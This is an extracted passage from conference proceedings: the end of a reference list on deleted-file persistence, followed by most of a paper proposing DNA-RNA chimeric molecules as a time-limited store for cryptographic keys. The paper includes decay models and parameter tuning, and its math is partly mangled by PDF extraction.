References 1. Shaaban, A., Sapronov, K.: Filesystem analysis and data recovery. In: Practical Windows Forensics: Leverage the Power of Digital Forensics for Windows Systems, p. 96. Packt Publishing, Birmingham, UK (2016) 2. Zelkowitz, M.V.: Partition organization. In: Advances in Computers: Software Development, p. 7. Academic Press (2011) 3. Vacca, J.R., Rudolph, M.K.: Technical overview: system forensic tools, techniques, and methods. In: System Forensics, Investigation, and Response, p. 86. Jones & Bartlett Learning, Sudbury (2010) 4. Farmer, D., Venema, W.: The persistence of deleted file information. In: Forensic discovery, pp. 145–148. Addison-Wesley, Upper Saddle River, NJ (2007) 5. Duits, J.: The world’s first data recovery, 08 December 2014. https://www.krollontrack.com/ blog/2014/01/09/worlds-first-data-recovery/. Accessed 07 July 2017 6. Carrier, B.: Chapter 1: Digital Investigation Foundations. File System Forensic Analysis, pp. 20–21. Addison-Wesely, Upper Saddle River (2015) 7. Yoo, B., Park, J., Lim, S., Bang, J., Lee, S.: A study on multimedia file carving method. Multimedia Tools Appl. 61(1), 243–261 (2011). https://doi.org/10.1007/s11042-010-0704-y 8. Dewald, A., Seufert, S.: AFEIC: advanced forensic ext4 inode carving. Digit. Investig. 20 (2017). https://doi.org/10.1016/j.diin.2017.01.003 9. Poisel, R., Rybnicek, M., Schildendorfer, B., Tjoa, S.: Classification and recovery of fragmented multimedia files using the file carving approach. Int. J. Mob. Comput. Multimedia Commun. 5(3), 50–67 (2013). https://doi.org/10.4018/jmcmc.2013070104 10. Garfinkel, S.: Carving contiguous and fragmented files with fast object validation. Digit. Investig., 2–12 (2007)
672
T. M. Khan et al.
11. Gubanovis, Y., Afonin, O.: Recovering evidence from SSD drives in 2014: understanding TRIM, garbage collection and exclusions. Forensic Focus for Digital Forensics and Ediscovery Professionals (2014). https://articles.forensicfocus.com/2014/09/23/recoveringevidence-from-ssd-drives-in-2014-understanding-trim-garbage-collection-and-exclusions/. Accessed 20 May 2017 12. Russinovich, M.E., Solomon, D.A., Ionescu, A.: Chapter 9: Storage management. In: Windows Internals, Part 2, p. 130. Microsoft Press (2012) 13. Zhang, S.: 8 vital factors affecting hard drive data recovery, 26 May 2017. https://www.datanu men.com/blogs/8-vital-factors-affecting-hard-drive-data-recovery/. Accessed 09 July 2017 14. Lange, M.C., Nimsger, K.M.: Computer forensics. In: Electronic Evidence and Discovery: What Every Lawyer Should Know Now, p. 217. Section of Science & Technology Law, American Bar Association, Chicago, IL (2009) 15. Riden, J.: Persistence of data on storage media, 25 June 2017. https://www.symantec.com/ connect/articles/persistence-data-storage-media. Accessed 08 July 2017 16. Reust, J.: Fifth annual DFRWS conference. Digit. Investig. 5, 4 (2005). https://doi.org/10. 1016/j.diin.2015.07.001 17. Fairbanks, K., Garfinkel, S.: Column: factors affecting data decay. J. Digit. Forensics Secur. Law 7(2), 7–10 (2012) 18. Jones, J.H., Khan, T.M.: A method and implementation for the empirical study of deleted file persistence in digital devices and media. In: 2017 IEEE 7th Annual Computing and Communication Workshop and Conference (CCWC) (2017) 19. Garfinkel, S., Nelson, A.J., Young, J.: A general strategy for differential forensic analysis. Digit. Investig. 9, S50–S59 (2012) 20. Fairbanks, K.D.: A technique for measuring data persistence using the ext4 file system journal. In: 2015 IEEE 39th Annual Computer Software and Applications Conference (COMPSAC), vol. 3, pp. 18–23. IEEE July 2015 21. Dittner, R., Majors, K., Seldam, M., Grotenhuis, T., Rule, D., Green, G.: Virtualization with Microsoft Virtual Server 2005, p. 158. Syngress, Rockland, MA (2006) 22. Kumar, K., Stankowic, C., Hedlund, B.: In: VMware vSphere Essentials: efficiently virtualize your IT infrastructure with vSphere, p. 126. Packt Publishing, Birmingham (2015) 23. Purcell, D.M., Lang, S.-D.: Forensic artifacts of microsoft windows vista system. In: Yang, C.C., et al. (eds.) ISI 2008. LNCS, vol. 5075, pp. 304–319. Springer, Heidelberg (2008). https://doi.org/10.1007/978-3-540-69304-8_31 24. Chirammal, H.D., Mukhedkar, P., Vettathu, A.: Mastering KVM Virtualization, p. 196. Packt, Birmingham, UK (2016) 25. Shrivastwa, A.: OPENSTACK: Building A Cloud Environment, p. 292. Packt Publishing Limited, Birmingham (2016) 26. Carrier, B.: File System Forensic Analysis, pp. 236–237. Addison-Wesley, Boston (2005) 27. Berman, R.: Chapter 3: How a hard drive works. In: All About Hard Disk Recorders: An Introduction to the Creative World of Digital, Hard Disk Recording, pp. 19–22. Hal Leonard, Milwaukee, WI (2003) 28. Nikkel, B.: Chapter 1: Storage media overview. In: Practical Forensic Imaging Securing Digital Evidence with Linux Tools, p. 12. No Starch Press, San Francisco (2016) 29. Hailperin, M.: Disk space allocation. In: Operating Systems and Middleware: Supporting Controlled Interaction, p. 284. Thomson, Boston (2007) 30. Jones, J.: Differential analysis as a data science tool for cyber security. In: Sanchez, I.C. (ed.) Proceedings of the Advance and Applications of Data Science and Engineering, pp. 29–32 (2016)
Factors Affecting the Persistence of Deleted Files
673
31. Laamanen, M., Nelson, A.: NSRL Next Generation - Diskprinting. Forensics @ NIST, Gaithersburg, MD, 3 December 2014 (2014). http://www.nsrl.nist.gov/Documents/Diskpr ints.pdf. Accessed 10 Apr 15 32. Jones, J., Khan, T., Laskey, K., Nelson, A., Laamanen, M., White, D.: Inferring previously uninstalled applications from digital traces. In: Proceedings of the Conference on Digital Forensics, Security and Law 2016, pp. 113–130 (2016) 33. Nelson, A.J.: Software signature derivation from sequential digital forensic analysis. Ph.D. dissertation, UC Santa Cruz (2016) 34. Garfinkel, S.L., McCarrin, M.: Hash-based carving: searching media for complete files and file fragments with sector hashing and hashdb. Digit. Investig. 14 (2015). https://doi.org/10. 1016/j.diin.2015.05.001
Taphonomical Security: DNA Information with a Foreseeable Lifespan Fatima-Ezzahra El Orche1,2,3(B) , Marcel Hollenstein4 , Sarah Houdaigoui1,2 , David Naccache1,2 , Daria Pchelina1,2 , Peter B. Rønne3 , Peter Y. A. Ryan3 , Julien Weibel1,2 , and Robert Weil5 1
ENS, CNRS, PSL Research University, Paris, France {fatima-ezzahra.orche,sarah.houdaigoui,david.naccache,daria.pchelina, julien.weibel}@ens.fr 2 ´ D´epartement d’informatique, Ecole Normale Sup´erieure Paris, Paris, France 3 SnT, FSTC, University of Luxembourg, Esch-sur-Alzette, Luxembourg {fatima.elorche,peter.roenne,peter.ryan}@uni.lu 4 Institut Pasteur, Paris, France [email protected] 5 Sorbonne Universiy, Inserm, UMR1135, CNRS, ERL8255, CIMI, Paris, France [email protected] Abstract. This paper introduces the concept of information with a foreseeable lifespan and explains how to achieve this primitive via a new method for encoding and storing information in DNA-RNA sequences. The storage process can be divided into three time-frames. Within the first (life), we can easily read out the stored data with high probability. The second time-frame (agony) is a parameter-dependent state of uncertainty; the data is not easily accessible, but still cannot be guaranteed to be inaccessible. During the third (death), the data can with high probability not be recovered without a large computational effort which can be controlled via a security parameter. The quality of such a system, in terms of a foreseeable lifespan, depends on the brevity of the agony timeframe, and we show how to optimise this. In the present paper, we analyse the use of synthetic DNA and RNA as a storage medium since it is a suitable information carrier and we can manipulate the RNA nucleotide degradation rate to help control the lifespan of the message embedded in the synthesized DNA/RNA molecules. Other media such as Bisphenol A thermal fax paper or unstable nonvolatile memory technologies can be used to implement the same principle but the decay models of each of those phenomena should be re-analysed and the formulae given in this paper adapted correspondingly. Keywords: Cryptography · Information with foreseeable lifespan Data storage · Information theory · DNA · RNA
1
·
Introduction
Over time, the physical media on which we store information degrades. Traditionally, much effort has been put into protecting media against degradation to achieve more robust and durable storage mechanisms. c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 674–694, 2023. https://doi.org/10.1007/978-3-031-28073-3_46
Taphonomical Security
675
In this paper, instead of resisting the time’s unavoidable effects, we try to exploit them: rather than allowing information to slowly and progressively get destroyed, we aim at a swift and complete erasure. Just as a thermal fax machine paper that fades with time, we propose to synthesize DNA and RNA molecules whose lifetime can be approximately tuned. Such a “time fuse” can guarantee, for instance, that a cryptographic secret (typically a plaintext encrypted under a hash of the DNA information) cannot be used or recovered beyond some expiry date. Since DNA is a reasonably stable molecule, we assume in this paper that DNA does not degrade at all. By contrast, RNA nucleotides quickly decay over time. We hence propose to synthetically incorporate RNA nucleotides in DNA molecules. The DNA nucleotides will store the cryptographic secret whereas RNA will serve as a natural countdown mechanism. This technique guarantees that, with high probability, the whole secret will be recoverable before some target time ttarget1 , but will not be reconstructible after ttarget2 . A mathematical analysis allows tuning the ti as a function of the molecules’ molecular decay probability distribution and the storage environment parameters such as temperature and exposure to radiation. Structure of the Paper. We start (Sect. 2) by a general overview of the biochemical notions necessary to understand the concept. The method itself is presented in Sect. 3. In Sect. 4, we introduce a probabilistic model and mathematically determine bounds on the ti s. We analyse our method’s efficiency and explain how to tune the ti s in Sect. 5. Appendix A provides proofs and Appendix B, lists numerical values.
2
Biochemical Preliminaries
For the article to be understandable, it is necessary to present a few biochemical notions about DNA and RNA [16]. The following sections will deal with DNA and RNA composition and degradation. The acronym “NA” (Nucleic Acid) will denote both DNA and/or RNA. 2.1
NA Composition
DNA and RNA belong to the category of NAs, which are bio-macro-molecules; both are chains of nucleotides. A nucleotide is composed of a nucleobase, a pentose sugar and one phosphate group. In nature, there exist five different nucleotides: adenine (A), thymine (T), uracil (U), cytosine (C) and guanine (G). DNA contains A, T, C, G, whereas RNA contains A, U, C, G. Figure 1 shows the structures of NAs, while Fig. 2 details the four DNA nucleotides. A fundamental difference between DNA and RNA is their pentose composition. DNA pentose has a deoxyribose sugar which has no substituent at position C2’, whereas the RNA sugar is a ribose which contains a 2’-hydroxyl (OH) moiety as shown in Fig. 3.
676
F.-E. El Orche et al.
Fig. 1. RNA and DNA structures
Fig. 2. Closeup structure of DNA with the four nucleotides represented: Adenine, Thymine, Cytosine, and Guanine
Another chemical difference between DNA and RNA appears when considering hydrolysis of RNA in buffer: cleavage can occur by an intramolecular attack of the 2’-OH unit which is on the sugar moiety on the phosphorous center of the phosphodiester unit. Since DNA lacks a 2’-OH and RNA has a 2’-OH such a reaction is favored in RNA as displayed by the differences in the rates of uncatalyzed hydrolysis [15] (see Sect. 2.2). 2.2
NA Bonds Degradation Over Time
NAs degrade over time. The main degradation reaction of RNA nucleotides is called transesterification, while the main degradation phenomena for DNA are phosphodiester hydrolysis, oxidative cleavage, and cleavage as a result of depurination. Whilst we will not dive deeper into the particularities of those biochemical processes, the reader may wonder why the same degradation reactions do not apply to both DNA and RNA. This results from the fact that the difference in the pentose has a considerable influence on the reactions leading to degradation. Briefly, in DNA a hydroxide ion (OH-) will attack the phosphorous center which eventually will lead to hydrolysis of the phosphodiester bond. Such a mechanism can also occur in RNA but since RNA displays a 2’-OH moiety, this hydroxyl group can be activated (by deprotonation under basic conditions
Taphonomical Security
677
Fig. 3. RNA and DNA Pentose
or by metal coordination) and attack the phosphorous center in an intramolecular rather than in an intermolecular manner [12,18]. In particular, there is a big difference between the two degradation speeds: under representative physiological conditions, RNA hydrolysis is 105 times faster than DNA hydrolysis. DNA degradation speed is hence almost negligible compared to the RNA degradation. In what follows, we are chiefly interested in considering the RNA degradation in our mathematical analysis. Figure 4 illustrates the way in which RNA degrades.
Fig. 4. RNA degradation through transesterification
2.3
On the Synthesis of RNA-DNA Chimeric Oligonucleotides
Oligonucleotides in general can be synthesized by two main approaches: chemical synthesis based on solid-phase methods and enzymatic synthesis. In this section, we will briefly describe both methods and then highlight how DNARNA chimeric oligonucleotides required for our purposes could be made. Chemical Synthesis. The main synthetic access to RNA and DNA oligonucleotides is granted by automated DNA and RNA solid-phase synthesis. In this approach, activated nucleoside units called phosphoramidites are sequentially added on a first nucleoside bound to a solid support. Each cycle encompasses a coupling step (where the incoming phosphoramidite is reacted with a free 5’-OH
678
F.-E. El Orche et al.
unit of a solid support bound nucleoside) followed by a capping step (to avoid reaction of unreacted hydroxyl moieties in subsequent steps). The coupling and capping steps are followed by oxidation of the newly created linkages (P(III) to P(V)) and removal of the next protecting group to enable continuation of the synthesis (the interested reader is directed to more comprehensive review articles dedicated to this topic [8,11]). Such syntheses are usually carried out on synthesizers (Fig. 5) on scales ranging from μmoles to moles. This method is routinely used to synthesize DNA and RNA oligonucleotides either based on standard chemistry or encompassing chemical modifications required for in vivo applications. However, this method is restricted to rather short (i.e. around 100– 150 nucleotides for DNA and around 100 nucleotides for RNA [2,8,11] oligonucleotides due to low yields for fragments exceeding 100 nucleotides because of folding on solid support during synthesis and due to the inherent nature of the coupling yields (even with a 99% coupling efficiency, the maximum theoretical yield that can be obtained for 100 nucleotide long sequence would be 0.99100 37%). Hence, this approach is ideal for synthesizing short DNA-RNA chimeric oligonucleotides but is unlikely to be applicable to longer sequences.
Fig. 5. DNA synthesizer used for solid-phase synthesis of DNA and RNA oligonucleotides
Enzymatic Methods. The most popular enzymatic methods for the synthesis of oligonucleotides include polymerase-assisted synthesis using nucleoside triphosphates and ligation of shorter fragments into long oligonucleotides. In the first strategy, nucleoside triphosphates are recognized by enzymes called polymerases which add these nucleotides onto a growing chain of DNA or RNA. For DNA synthesis, the presence of a primer and a template are strictly required since
Taphonomical Security
679
the polymerase will add nucleotides at the 3’-end of the primer while the sequence composition of the template will dictate the polymerase which nucleotide needs to be incorporated. On the other hand, RNA polymerases are primer independent and only require the presence of a DNA template to mediate transcription of DNA into RNA. Such a method can be coupled with chemical modifications to generate mRNA vaccines [4,13] and other functional nucleic acids [1,7]. This method is not restricted to any size limitation and is compatible with numerous chemical modifications. On the other hand, the sequence specific incorporation of distinct RNA nucleotides in long DNA oligonucleotides will be difficult to achieve by this method. In the second method, DNA or RNA ligases mediate the formation of phosphodiester linkages between the terminal 3’-OH residue of an oligonucleotide with the 5’-end (usually phosphorylated) of a second oligonucleotide [17]. Often a “splint” oligonucleotide is required as a template since this guide oligonucleotide is partially complementary to the termini of both oligonucleotides that need to be ligated together. This method is compatible with the synthesis of longer oligonucleotides [14] as well as with different chemistries in oligonucleotides [5,10], and hence is deemed as the method of choice for this project. Synthesis of RNA-DNA Chimeric Oligonucleotides. To synthesize long DNA oligonucleotides containing RNA nucleotides at distinct and specific positions in the future we propose to synthesize short DNA-RNA sequences using solid phase synthesis and combine these fragments by (repeated) ligation reactions as highlighted in Fig. 6. This protocol will circumvent the drawbacks associated with all the different methods and should yield the desired oligonucleotides.
Fig. 6. Schematic representation of the synthesis of long DNA oligonucleotides containing RNA nucleotides (star symbols) using a combination of solid-phase synthesis (short blue fragments) and DNA ligation reactions
680
F.-E. El Orche et al.
2.4
RNA Degradation in Further Detail
RNA nucleotide degradation probability follows an exponential distribution of parameter λ. λ depends on numerous factors such as temperature, pH and the concentration of some ions1 . Degradation also depends on the sequence context and the 3D structure of the RNA oligonucleotide. We will use Eq. (1) of [9] to model λ: λ = λ0 · 10e · cK · [K + ]dK · cM g · [M g 2+ ]dM g
(1)
where e = apH (pH − bpH ) + aK ([K + ] − bK ) + aT (T − bT ) λ0 = 1.3 · 10−9 min−1 and the constants are indicated in Table 4 in Appendix B with their corresponding units. Note that Eq. (1) is an approximation and λ0 needs to be updated depending on the considered range of physical parameters. See [9] for more details. We give in Table 7 in Appendix B several λ values under different conditions and the corresponding λ0 values. The expected time for one RNA nucleotide to degrade (which is 1/λ) is given in the table to get an idea of the order of magnitude of time. This will prove helpful in the rest of the paper for determining which λ to work with when tuning the information’s lifetime. The chemical parameters mentioned in this table are taken from Table 1 and using Equation (e) from [9].
3
The Proposed Method
This section presents our new method for encoding and storing information using DNA and RNA nucleotide. We propose a way on how to synthesize a new DNA/RNA molecule, and we show that we can reach a good security level with our method. 3.1
Description of the Method
The idea is to incorporate RNA fragments into DNA oligonucleotides using standard solid-phase synthesis and produce DNA-RNA chimeric sequences to form a new DNA/RNA chimeric oligonucleotide. A DNA fragment can be composed of one nucleotide base (A, C, T, G) or by a juxtaposition of several nucleotides bases linked to each other (AA, CC, T T, GG, AC, AT, GT, ACT, · · · etc). The chain’s length depends on the size of the key that we want to encode and store. This DNA/RNA chimeric oligonucleotide will contain k RNA nucleotides and k + 1 DNA fragments. We synthesize n copies of this molecule and keep it in a fluid. To understand the insertion/encoding mechanism, we refer the reader to Fig. 7 which illustrates the insertion of the key SECRET. In this example, we have 5 RNA nucleotides and 6 DNA fragments and an alphabetic substitution for each 1
[K + ], [M g 2+ ].
Taphonomical Security
681
letter in which we arbitrarily assigned different fragments to different letters of the English alphabet. Note that below we will actually use distinct DNA molecule fragments and encode the stored information into the permutation of these.
Fig. 7. An explanatory illustration of one copy of the DNA/RNA oligonucleotide encoding the key SECRET. Beads represent DNA fragments and inter-bead links are RNA nucleotides
3.2
Encrypting Information
Encrypt the information to be time-protected using some symmetric cipher (e.g. AES [3]) and encode the key as an DNA/RNA oligonucleotide using a permutation of pairwise distinct DNA fragments. Erase the plaintext and the electronic version of the key and assume that the ciphertext is accessible by the opponent. Hence, as long as we can reconstruct the key from the DNA/RNA oligonucleotide the plaintext is recoverable. We will now focus our attention on the recovery of the key from the DNA/RNA oligonucleotide, as long as this molecule is physically reconstructible. 3.3
Key Reconstruction
We assume that the DNA fragments are pairwise distinct by construction. Call the DNA/RNA oligonucleotide w and remember that it contains k RNA nucleotides. Remember as well that there are n copies of w floating in a liquid. Suppose that all the copies of w were cut randomly in pieces. We are given the set of these pieces, and we seek to restore the initial oligonucleotide w if such a reconstruction is still possible. Figure 8 represents the evolution of 3 copies of a key made of 9 DNA fragments.
Fig. 8. An evolution of a secret with 3 copies and 9 fragments in each copy
682
F.-E. El Orche et al.
The following algorithm outlines how we can recover the information after it has begun degrading if such a reconstruction is possible at all. – 1 First, we can easily obtain all fragments of w by analysing the pieces we are given. For each fragment x, we will try to find the “next” fragment next[x] (the one which follows x in the molecule w). If for all fragments except one (which is w’s last fragment) the next fragment is found, we can restore w. – 2 For any two fragments x and y, if there exists a third piece where y follows x, then in the initial molecule w, y also follows x, and thus next[x] = y. Therefore, we have just to treat each piece as follows: for every fragment x except the last, define next[x] as the fragment following x inside that piece. Since all fragments of w were distinct, there is at most one possible value of next[x] for all fragments x. Figure 9 represents this relation in a graph. – 3 After this procedure, we have to find a fragment which follows nothing, and if it’s unique, we set it as the first and then add next fragments one by one until there is nothing to add. This allows us to reconstruct w. If there are several such fragments, w cannot be recovered without brute-force guessing.
Fig. 9. The graph representing the next[x] relation in the algorithm
If we got several fragments following nothing at the end of the algorithm, it is impossible to recover the initial molecule having no information except the input. We can only obtain separated pieces of w applying the last step of the algorithm to each of the “first” fragments. This situation happens if and only if at least one cut occurred during degradation, i.e. in all molecules, the RNA nucleotides at the same specific location in all the molecule broke. The probability of this happening will be investigated in the next section. 3.4
Security
We now turn to measure our method’s security, but before doing so, let us define what the term cut means.
Taphonomical Security
683
Definition 1. A cut happens at the ith position if for all 1 ≤ i ≤ k, the ith bond of each of the n copies is broken. Assume that the secret contains cuts. For each cut, the next fragment after this cut follows nothing according to the reconstruction algorithm. Simultaneously, for all other fragments except the first one of the initial molecule, there is at least one piece where this fragment follows another one. This means that the only pieces which can be recovered are any piece delimited by two cuts or the pieces delimited by one cut and an endpoint of the initial molecule. Since no link can be guessed between two described pieces, the only strategy to recover the whole initial molecule is to test all reconstructed pieces’ permutations. If there are k cuts, then (k + 1)! possibilities need to be browsed. This fact defines security: a given number of cuts guarantees a security of ≈80, 100, 128, 256 bits. Table 3 (a trivial log2 (k + 1)! lookup table given in Appendix B for the ease of quick reference) gives the correspondence between the number of security bits versus the number of cuts and DNA fragments. The number of security bits, which is called the security parameter and that we denote a, is simply: a = log2 (nD !), where nD is the number of the DNA fragments. Current Biological Limitations. It is currently technically feasible to have an NA chain of about 100 nucleobase pairs [2,8,11]. Each DNA chunk is linked by an RNA pair. In the security analysis in this paper we assume that each DNA chunk is unique, since copies reduce the security (and would makes the following analysis harder). Since the security stems directly from the number of RNA fragments, we should construct chains containing the maximal number of RNA bonds while observing distinctness of the DNA fragments. Hence, we start by generating all 1-digit integers in base 4 (there are u1 = 4 of them), then all two digit integers in base 4 (there are u2 = 42 = 16 of them) and finally we will fill in with 3-digit integers in base 4. Linking the u1 + u2 = 20 1- and 2-digit pairs requires u1 + u2 − 1 = 19 RNA nucleobase pairs. Hence, all in all we are already at a molecule comprising: u1 + 2u2 + u1 + u2 − 1 = 4 + 2 × 16 + 4 + 16 − 1 = 55 pairs To proceed, the 45 remaining pairs, permitted by the current technological synthesis capacity, must be constructed using 3-digit integers linked with 1 RNA bond. We can hence solve 45 ≥ 3u3 + u3 to get u3 = 11 (we need one RNA bond for each 3-digit fragment and one RNA to bind to the rest of the string). The security level of the resulting scheme is log2 ((u1 + u2 + u3 )!) = log2 31! 113 bits. Note that it is possible to artificially construct new types of DNA molecules, see [6] where two new types have been constructed. Assuming that we have 6 different types of DNA molecules at hand the analysis above can be repeated. First we have 6 1-digit integers in base 6. We now have 6 1-digit integers in base 6 and 36 2-digit integers in base 6. We first choose u1 = 6 and solve
684
F.-E. El Orche et al.
100 − (u1 + u1 − 1) = 89 molecules left. We then solve 89 ≥ 2u2 + u2 to get u2 = 29. In this case don’t need 3-integers. In total we now have 34 RNA bonds, log2 ((u1 + u2 )!) = log2 35! 133 bits.
4
Controlling the Information Lifetime
In order to understand and control the lifetime of the information embedded in the DNA/RNA molecules, we introduce a probabilistic model and mathematically determine the bounds on the information lifetime. 4.1
Probabilistic Model
Recall that k denotes the number of RNA nucleotides in each of the n identical copies of the initial molecule w. Denote by Li,j the random variable giving the degradation time of the j th RNA nucleotide of the ith copy. Our main assumption is that the Li,j , for all i, j, are independent and identically distributed random variables following the exponential distribution of parameter λ. Denote by Tj the random variable representing the time for the cut at the j th position to appear and by tx the random variable giving the xth cut time to appear. tx is the xth order statistic of (Tj )1≤j≤k , i.e. the xth smallest element of {T1 , · · · Tk }. By definition, Tj = max Li,j and in compactified notation, tx = T(x) . 1≤i≤n
4.2
The Information Lifetime Bounds
We consider that the information stored in the NA molecule goes through three different periods that we call: life, agony and death. In this section, we describe each period separately, and give the mathematical model allowing us to determine the bounds of each one of them. Figure 10 shows the different periods represented on a time axis:
Fig. 10. The information lifespan
Life: The information embedded in the NA molecule is fully accessible during the first phase. This happens when no cut has occurred, i.e. for t ∈ [0, t1 [. Let Tmin = min Tj be the random variable giving the time at which the first cut to j≤k
occur. We have t1 = Tmin and : k
P(Tmin > t) = (1 − (1 − exp(−λt))n )
(2)
Taphonomical Security
685
Agony: Agony starts after the first cut has appeared. We can only recover the information by at least brute-force guessing. For each guess, the probability p that a guess gives the correct secret is equal 1 , where x is the number of cuts at the time t. Agony ends when the ath to (x+1)! cut appears, i.e. we have t ∈ [t1 , ta ]. Death: After the ath cut, we consider the information to be dead – it is no longer feasible to brute-force a recovery of the information. We have ta = Tmax and: a−1 k P(Tmax ≤ t) = 1 − (3) p(t)i (1 − p(t))k−i i i=0 n
with p(t) = (1 − exp(−λt)) . In this case t ∈]ta , ∞[ and it is computationally infeasible within the chosen security parameter to recover the secret information. Proof. See Appendix A for the derivations of Eq. (2) and Eq. (3).
Fig. 11. Probabilities as functions of the number of copies n, with a fixed number of RNA bonds k = 80 (Left), and as functions of the number of RNA bonds k with a fixed number of copies n = 60 (Right). Here a = 24 and λ = 0.001 min−1 .
We note that P(Tmin > t) is increasing in n and decreasing in k, t and λ, and P(Tmax ≤ t) is increasing in k, in p(t) and thus in t and λ, but decreasing in n. See Fig. 11 for an illustration. Lemma 1 (Evolution of the number of cuts over time). Let C(t) denote the number of cuts at the time t. C is a random variable and we have: E[C(t)] = k × (1 − exp(−λt))n Proof. See Appendix A. The following Lemma allows us to calculate the expected life spans and their variance.
686
F.-E. El Orche et al.
Lemma 2. (The average time and the variance for the xth cut to appear The average time when the xth cut appears, E(tx ), and the corresponding variance, V (tx ), are given by the following formulas: ⎡ kn 2 ⎤ kn kn Cx (k, n, s) 1 1 − Cx (k, n, s), V(tx ) = 2 ⎣2 Cx (k, n, s) ⎦ E(tx ) = λ s=1 λ s s=1 s=1 where: s k−m k mn k − m ni (−1)s+1 i k Cx (k, n, s) = (−1) m p i s−p s m=x p=0 i=0 Proof. See Appendix A.
Fig. 12. E[t24 ] and E[t1 ] as functions of n for k = 40 (Left) and as functions of k for n = 60 (Right)
E(tx ) is increasing in n under fixed k and it is decreasing in k under fixed n. See Fig. 12 for an illustration.
5
Parameter Choice and Efficiency Analysis
This section presents three different methods on how to tune the lifetime of the information embedded in the NA molecule. The first method consists of determining the best (n, k) pair to choose. We want the data to still be accessible before some given time t and destroyed after some given time t , both with a chosen tolerance level for the probability. The second method seeks the optimal (n, k) pair yielding the shortest agony time phase compared to the total life time, i.e. being able to determine the lifespan as clearly as possible. Finally, in the third method, we describe how to find the best (n, k) pair, such that the expected value E(n, k, ta ) is very close to some target time ttarget with minimal variance, giving the best guarantee that the data will be destroyed after this time.
Taphonomical Security
5.1
687
Finding (n, k) for Target Times t and t
For specific t and t values, we want our data to still be accessible up to t and completely destroyed after t ; what is the (n, k) pair to consider? To answer this question, n and k should satisfy the following criteria: P(Tmin > t) 1 and P(Tmax ≤ t ) 1 To this end, we fix a tolerance level, Δ, and require: P(Tmin > t) ≥ 1 − Δ and P(Tmax ≤ t ) ≥ 1 − Δ with Δ = Δ · 10−2 .
Fig. 13. Domains bounds of existing solutions satisfying P(Tmin > 3000) ≥ 96% (blue indicates lower bound) and P(Tmax ≤ 5000) ≥ 96% (orange indicates upper bound). Here Δ = 4 and λ = 0.001 min−1 . The time is in min.
Figure 13 shows that a solution exists at the intersection point of the two curves. For the example in Fig. 13, the solution for t = 3000 min and t = 5000 min is: (n, k) = (150, 86). This means that if we manufacture 150 NA copies containing 86 RNA nucleotides in each, there is a chance of 96% that the secret is still accessible before 3000 min and completely destroyed after 5000 min. Other solutions for other target t and t are given in Table 1. Table 1. (n, k) solutions for different values of target t and t (in minutes). Here λ = 0.001 min−1 and Δ = 4 t\t
2000
3000
4000
5000
(15, 38)
(15, 30)
2000 –
(71, 1243) (53, 83)
(48, 40)
3000 –
–
(206, 1492) (150, 86)
4000 –
–
–
1000 (22, 819) (17, 74)
(572, 1584)
688
F.-E. El Orche et al.
The results of Fig. 13 and Table 1 were obtained after running a search code in Python available from the authors. Note that these (n, k) values represent the solutions having the lowest cost in terms of n and k. Finding (n, k) with Lowest Agony Ratio
5.2
What if we want that the data stored in the NA molecule to be fully accessible before some time t and then gets quickly destroyed after some time t ? Depending on a specified risk level, expressed through α, we want that the time from E(t1 ) − αδt1 , where we are confident to have the information fully available, until time E(ta ) + αδta , where we are confident that it is destroyed, is as short as possible. Here δ is the standard deviation. We thus define the agony ratio as: f (n, k) =
E(ta ) + αδta , E(t1 ) − αδt1
and aim to find the (n, k) pair giving the smallest ratio, i.e. being as close to one as possible. Note that the agony ratio f does not depend on λ. This is particularly useful if we can adjust the fluid’s chemical properties to determine the actual life span, refer to Table 7 in Sect. 2.4 to have an idea about the order of magnitude of the time for different values of λ. We expect, at least for large k and n, that the probabilities p1 = P(E(t1 ) − αδt1 < t1 ) and p2 = P(E(ta ) + αδta > ta ) are close to the ones derived from a normal distribution. This is confirmed by Table 6 in Appendix B, which gives numerical values of p1 and p2 for the cases α = 1 and α = 2. Table 5 in Appendix B shows that we effectively have lower agony ratios when n and k are significant, the best (n, k) pair is then the one with the largest values of n and k. This suggests to go further with more significant values of n and k, when the resources allow it, and when actual acceptable timings can be found depending on λ. As an example, we take (n, k) = (280, 280) and we give in Table 2 numerical values for (t, t ) = (E(t1 ) − 2δt1 , E(ta ) + 2δta ) for different values of λ and α = 2. In this case, f (280, 280) 1.41 and (p1 , p2 ) (0.96, 0.97). Remember that getting other values for (t, t ) requires choosing other values for λ and hence adjusting the chemical properties of the fluid accordingly. Table 2. The best (t, t ) solutions in terms of the lowest agony ratio for different values of λ. Here (n, k) = (280, 280), α = 2 and a = 24 λ (in mins−1 ) 10−3
4.5 · 10−4
4.06 · 10−5
3.3 · 10−6
1.22 · 10−7
(t, t )
(57.5, 81.5) hours (5.3, 7.5) days (2, 2.8) months (2, 2.8) years (53.3, 75.7) years
(p1 , p2 )
(0.96, 0.97)
(0.96, 0.97)
(0.96, 0.97)
(0.96, 0.97)
(0.96, 0.97)
Agony ratio
1.41
1.41
1.41
1.41
1.41
Taphonomical Security
5.3
689
Finding (n, k) for Target Time ttar g et with the Least Variance
For a target time ttarget we want that the secret data is inaccessible after ttarget , what is the best (n, k) to consider? To answer this question n and k should satisfy the following approximation: E(n, k, ta ) − ttarget 0 We are therefore looking for (n, k) pairs minimizing the distance between E(ta ) and ttarget . However, we also want to be as confident as possible that this is the time that the information is destroyed. Hence, we would prefer the (n, k) pair for which E(ta ) has the least variance. Figure 14 represents the optimal (n, k) solutions verifying E(n, k, ta ) 2000 min. We see that we have the least variance when n and k are large. Table 8 gives the corresponding k for each n.
Fig. 14. Optimal solutions for ttarget = 2000 min. The blue lines represent the standard deviation, the red points represent the expected values E(t24 ), and the green ones represent E(t1 ). Here λ = 0.001 min−1
